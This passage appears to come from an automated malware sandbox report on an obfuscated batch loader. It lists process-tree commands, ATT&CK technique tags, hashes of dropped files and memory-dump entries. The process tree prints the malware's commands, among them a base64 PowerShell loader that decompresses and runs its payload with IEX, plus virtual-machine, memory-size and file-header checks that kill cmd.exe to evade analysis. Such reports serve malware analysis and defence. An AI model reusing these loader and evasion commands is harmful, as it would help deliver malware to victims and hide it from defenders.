5AHkAcQBkADcATABVADYAZQBQAG8AKwA3ADUASQBsAHIATwA2AG4AWgBTAGYASwBFAGQAcAA5AFAAUABMAFoAYgAvAEcAZgB3AFgAegBVADUAcQAvAEEAegBQAE0ANABCAHoANQBlAEkAQQBmAEsAYwBuAFAATwBHAFYAdABNAFAAOQBDAFcAZQBMAGIAeABlAGgANgBKAEsAMwA5AHoAUAB3ADAAawBOAFMAbwB6ADAAZQBQAHoAeAB1AEQAeABYAE4ARwBaAEoANwBHAHkAMQBkAGgANwAzAGwAVAByAHYAbgBFAHAARwBlADgAZgA5AHYAVgBNAG0AYQB1AFQAVwBqAGEAcgA2AE4AUwAyAHQARwA0AC8AdwBhAFMAbABLAEoAcABCAC8AQwBQAHoANQBpAEoAbgB3AFgAaQBCADUAVwBlAFQAbABPAEgAbgAvADgASgBDAFcAMABMAHYAMwBUAHkAOQBmAG8AdABmAGIAMgBQAG0AKwBmAHoAUQBqAHIAawA2AHEAMwB0ADkAOQB1ADgAMABYAEkAZgBoAFEAWgBYADgAMQB6AFcAbQBBADAAQgAzAEEAdgBQAHIAeQBpAGUAegBXAFQAOQBzAGUAYQBWAC8AbgBxAHAARwBIAEUAbwBsAHMAOQB2AE4ALwBCAFEANgBRAHUAQgBEAHoATQBaAGsAUAAwAHIAYwB1AHAARwBEAHMAVwBjAGsAawArAEkAdQBSADcATQAvADMAUABzAEcANwA3AFkAdwB2AEoAZgBIAFQAVgBlADUANwBRADgAbgBsAGIAcQAzAFMARABEAGEAYgBkAEYAeQA2AFgAdgBFADIATgBYADUAdgBQAFcAdAArAHYALwB3AEgASQBnAGYAUQAzAGIASgBkAFgAaQBoAEYAVQBxAGwAVQBTAHAANgBWAEUAdABmADIAKwA4AFEAMABQAEQALwBPAHYAdQB2AEwASgAvAFAAaQBCAHkAZwBmAFQAZQBIAFUAMQBQAHUAQQBSAHcATABYAGcAZgA5AEgASAAvAHgAZwA5AGIAKwB6AG0ALwBDAFgAegBwAHoAZgAyAFUAcwBSAGYAVQA1AFoAMABzAFQALwBCAGEASgBrAEcATwBvAFQARABnAEEAQQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\loader_obf.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:972
- C:\Windows\system32\find.exe
  find "Pinging"
  2⤵
  PID:2680
- C:\Windows\system32\PING.EXE
  ping -n 1 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:2268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\loader_obf.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 8) {"Less than 8GB";spps -f -n "cmd" -ErrorAction SilentlyzjMZwyzudcgmaMy%iNVWzGXgsEaPCFb%tdPwiUNhfScywrCWF%qkxVuZTFlQqSbiCHZb%rywivqTYLaLPtepSxm%IamSeUqrefOTWOWLpSS%kMEXXRzOmcHJyvck%AnETDmgVwCzUUAwJ%KjuSaFTKEadUqQh%VRAxhVAZwekKsLLd%xxsJmFbrApnjqthYBLA%SuslkzTaqsovCYp%hMCqPlqlEnLXQDANrVggJBewSK}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2352
- C:\Windows\system32\doskey.exe
  doskey SUBST=GRAFTABL
  2⤵
  PID:2748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
2a07c72d984f94d4ede0db3e80b92623

SHA1
c335f2c1ef028b8f45e723bd5f15a5b0f4ad1478

SHA256
6a3f8c0c8b43b47082e45dab45489cecd3f76701bc938d0daa7505c468e2801f

SHA512
91809e8e809007c6e1b0263bc2b2bd077384eeb9cf3bd0f50dc6cd775f7262a73f5140ace2aff15ac7c843d5ef20d446d0dc00da990c98429000b26bd1f5372b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
868b50329bc243c5a95de4bf3404237a

SHA1
f509a01601ff4d443061384a2c6f13ffe99c13cd

SHA256
45b9203c79da0f0f4f9209cd7efdc4c5255d71672faf163330191fa764b59475

SHA512
5adcd78988966f6d2263714fd179c32a5ae467426dc5d15f1eaa0009350a6083db4f8ae93ad36038596190081b14d0295fbdb504e669473a792e3c8ca77b9253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a5c074e56305e761d7cbc42993300e1c

SHA1
39b2e23ba5c56b4f332b3607df056d8df23555bf

SHA256
e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

SHA512
c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a12c129e02e3d0e0ff14020158d6e53

SHA1
383434d0df826622f06b1f3811124782df21507b

SHA256
e0c11799edb944329f9ec85fd54a7038ea7df63d6a07162bc36fc03edb1bceb7

SHA512
4b6f2a88fc882ea9c05e9d8819114e35f30deae4366eafd1ec509d87cb02a26f2441b987272713725cbab9684233309e084802e7475876917fe9d6ab9e9cd05d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7d79979ee68215ea22f51bef21d4a970

SHA1
ac1de607c928d7891f65557203be3b58c14c89fa

SHA256
7bc62b0b07fdeead1f9695d9dcdb187c7b0c7e37a17d63f895530a0528f5a0e3

SHA512
1d965527fec0fa99c3655e7a2eb869cee8e1154dd3b7d54d7397aea76f9b5096240b0fed4e28b7409147e0d8fc141aea523440f6f18e13ac7df828e71b950e40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
164b35ec50bac71ed47e90c7da498d53

SHA1
361218359d0580961808d3d35b50e69d38be09ed

SHA256
304bcfbf3207ae85240d552790cfdf9b2b48bc0daa1cb6127d228c3663baf3a0

SHA512
be9329bdb7e06428b191478c7357f45064a372aad9a3b6fadb5fe21911e2f9b0b8d8d79365d40cb62b11216cf73c9acf8e904ca51e1f78e311bd9566340b45fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a316ebd4efa11d6b6daf6af0cc1aebce

SHA1
ab338dd719969c70590dbc039b90e2758c741762

SHA256
f7308f111e3910da5c34c4d06d78d692f44419f848f5bf886fd466d5a96ad014

SHA512
67a9b94b704222a1bbe02fa8780c6b9bd364c8581b693ca28c6a444fde160df216304426bacf6b01909b80540cf0add79669b7a88ca260a6fbc93c4742f36c5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c6a597e8737d320d364521986803cb2c

SHA1
6b542167fa6674b4f69a1bdd58c6f2fee4c57d49

SHA256
17107fc01623db2c028aa7e666e462b5dbbcaf7245329c3089080560607ea368

SHA512
c4bca8516a5272a15ae118bfbcb11db6d0666c6f48cd035b545c3df0e6436ffe20a1417e82ffc77ec430bc62157123bd9497ab9f621c82a6e2d32772ba7b7c87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a1127a05777a6f6c786c6a35dc63830c

SHA1
8ab0c43d07c1f85424b1930c5a8d8450a1308beb

SHA256
895bfb1a8cccd1f8453564f85f83ed786a23d7c3f10e444a8a91c4e680bd2e23

SHA512
0625a4e211c1508ebb60a031d0479348638191315cb31763c9a5d7cc63a380078d6bd1377a012a1d8f801897d46d73372675152da3051691140404be2c481819

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8d0baf65572cfbd3f384d68f11961400

SHA1
fc5ed6020243f2230c0717baeddd3ab94ec93592

SHA256
052621bcecf0e7cde063c59243466e4c5c6010375c520e5404ed8ba27d47c212

SHA512
894adf6aba6fc59d1d5a900aa07ca373f8b450f57fdd4c53f1ecea2ddb79f072888e2baf4d4614496522c4a546b6c6726f2cabcf7d139ff44fc1ddd979ab44ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5a602966cb62f6387d5f5959737c9840

SHA1
b84c6760cf8c20116462367cde5d562154f29679

SHA256
708bb286bdffde53b4923c6368a3cc5eb14e390ebc6b48f6cc2d775032ad6932

SHA512
7f12dfe6decb5fa8de908a1dbd85a37c10dc748ce947305b7b80c05ca07eb67966b8ef6f16f1af1a7672c36870bbf9276a89d70133766be8fabff3f61d022644

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7245c0e7b7a3fb001874f6b6fd6f7b4e

SHA1
7316c74764e0e3b71ed381a13bc8cabf9ddc6393

SHA256
e6ee84130be0d1af7785a4282b886bd4416693d75f7c24c932776c7db026491b

SHA512
da56abf62773b526fb8191af39b0125f51023c97c4e6f1727079518f02f09bae09a0bcac7b88ac3d09a4d8c08d7e580cd8af44a12ed40f81889ffefc8c9b22e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fixu4mk4.rb2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\explorer.bat

Filesize
7KB

MD5
87a5ed00f39c4d03daa855d397a16d8e

SHA1
fba1b8886f8669ba54bec0bb51f6b2c904113b6c

SHA256
62d2a6a05756f3c9b56d2c5ebe4c0fc66abaaea02653ffd51515a56d8e0092ee

SHA512
dd0bdad42994dde2c2b22c439233280b9c6f5e26076660d59f8c05d7dbc540158c4fa655361a79785e79a2567ce056782908469aceae673e662e762de0206eb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotJIhlF.bat

Filesize
177B

MD5
01f849e74be30f7e00ca4817b4c27436

SHA1
edb4f27ea701c1be26a0174c58837bafb7961e40

SHA256
4862b108afd360c11d64203c616b68710ef7a9cfadbbc70630a47bb8102d0f15

SHA512
74e929492c724fa8232c6a701b8e978135bec33b18a3428b2aedb8db08d96f0144ef2b939e58c952316a0aaadf0cd6f90262dbb8b8ed789eb73ed4b11d679a79

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotMaiavk.bat

Filesize
13B

MD5
337065424ed27284c55b80741f912713

SHA1
0e99e1b388ae66a51a8ffeee3448c3509a694db8

SHA256
4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b

SHA512
d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a

Download Submit
memory/8-100-0x0000023512DB0000-0x0000023512DC0000-memory.dmp

Filesize
64KB

Download
memory/8-112-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/8-99-0x0000023512DB0000-0x0000023512DC0000-memory.dmp

Filesize
64KB

Download
memory/8-98-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/440-193-0x00000283BBD90000-0x00000283BBDA0000-memory.dmp

Filesize
64KB

Download
memory/440-190-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/440-191-0x00000283BBD90000-0x00000283BBDA0000-memory.dmp

Filesize
64KB

Download
memory/440-195-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/972-244-0x00007FF98D1E0000-0x00007FF98DCA1000-memory.dmp

Filesize
10.8MB

Download
memory/972-242-0x000001B9AE2C0000-0x000001B9AE2D0000-memory.dmp

Filesize
64KB

Download
memory/972-241-0x000001B9AE2C0000-0x000001B9AE2D0000-memory.dmp

Filesize
64KB

Download
memory/972-240-0x00007FF98D1E0000-0x00007FF98DCA1000-memory.dmp

Filesize
10.8MB

Download
memory/1236-54-0x000002BCE9CA0000-0x000002BCE9CB0000-memory.dmp

Filesize
64KB

Download
memory/1236-56-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/1236-51-0x000002BCE9CA0000-0x000002BCE9CB0000-memory.dmp

Filesize
64KB

Download
memory/1236-41-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/1236-53-0x000002BCE9CA0000-0x000002BCE9CB0000-memory.dmp

Filesize
64KB

Download
memory/1272-206-0x0000024B68180000-0x0000024B68190000-memory.dmp

Filesize
64KB

Download
memory/1272-205-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/1272-210-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/1272-207-0x0000024B68180000-0x0000024B68190000-memory.dmp

Filesize
64KB

Download
memory/1988-114-0x000001452F0E0000-0x000001452F0F0000-memory.dmp

Filesize
64KB

Download
memory/1988-113-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/1988-126-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/2352-270-0x00000254CC550000-0x00000254CC560000-memory.dmp

Filesize
64KB

Download
memory/2352-273-0x00000254CC550000-0x00000254CC560000-memory.dmp

Filesize
64KB

Download
memory/2352-269-0x00007FF98D1E0000-0x00007FF98DCA1000-memory.dmp

Filesize
10.8MB

Download
memory/2352-271-0x00000254CC550000-0x00000254CC560000-memory.dmp

Filesize
64KB

Download
memory/2352-275-0x00007FF98D1E0000-0x00007FF98DCA1000-memory.dmp

Filesize
10.8MB

Download
memory/3040-25-0x000001F1DF400000-0x000001F1DF410000-memory.dmp

Filesize
64KB

Download
memory/3040-24-0x000001F1E1780000-0x000001F1E17A4000-memory.dmp

Filesize
144KB

Download
memory/3040-23-0x000001F1E1780000-0x000001F1E17AA000-memory.dmp

Filesize
168KB

Download
memory/3040-28-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/3040-22-0x000001F1DF400000-0x000001F1DF410000-memory.dmp

Filesize
64KB

Download
memory/3040-11-0x000001F1E1650000-0x000001F1E1672000-memory.dmp

Filesize
136KB

Download
memory/3040-12-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/3232-164-0x000001CD36050000-0x000001CD36060000-memory.dmp

Filesize
64KB

Download
memory/3232-163-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/3232-169-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/3232-167-0x000001CD36050000-0x000001CD36060000-memory.dmp

Filesize
64KB

Download
memory/3232-165-0x000001CD36050000-0x000001CD36060000-memory.dmp

Filesize
64KB

Download
memory/3416-77-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/3416-81-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/3416-78-0x000001E4B9AF0000-0x000001E4B9B00000-memory.dmp

Filesize
64KB

Download
memory/4340-259-0x00007FF98D1E0000-0x00007FF98DCA1000-memory.dmp

Filesize
10.8MB

Download
memory/4340-247-0x000001D8C8010000-0x000001D8C8020000-memory.dmp

Filesize
64KB

Download
memory/4340-246-0x000001D8C8010000-0x000001D8C8020000-memory.dmp

Filesize
64KB

Download
memory/4340-245-0x00007FF98D1E0000-0x00007FF98DCA1000-memory.dmp

Filesize
10.8MB

Download
memory/4412-142-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/4412-129-0x0000022E08CE0000-0x0000022E08CF0000-memory.dmp

Filesize
64KB

Download
memory/4412-128-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/4664-225-0x0000027DF45B0000-0x0000027DF45C0000-memory.dmp

Filesize
64KB

Download
memory/4664-230-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/4664-229-0x0000027DF45B0000-0x0000027DF45C0000-memory.dmp

Filesize
64KB

Download
memory/4664-228-0x0000027DF45B0000-0x0000027DF45C0000-memory.dmp

Filesize
64KB

Download
memory/4664-227-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/4664-226-0x0000027DF44F0000-0x0000027DF44F1000-memory.dmp

Filesize
4KB

Download
memory/4664-224-0x0000027DF45B0000-0x0000027DF45C0000-memory.dmp

Filesize
64KB

Download
memory/4664-223-0x0000027DF45B0000-0x0000027DF45C0000-memory.dmp

Filesize
64KB

Download
memory/4664-222-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/4852-97-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download
memory/4852-94-0x0000024849A20000-0x0000024849A30000-memory.dmp

Filesize
64KB

Download
memory/4852-93-0x0000024849A20000-0x0000024849A30000-memory.dmp

Filesize
64KB

Download
memory/4852-92-0x00007FF98CCC0000-0x00007FF98D781000-memory.dmp

Filesize
10.8MB

Download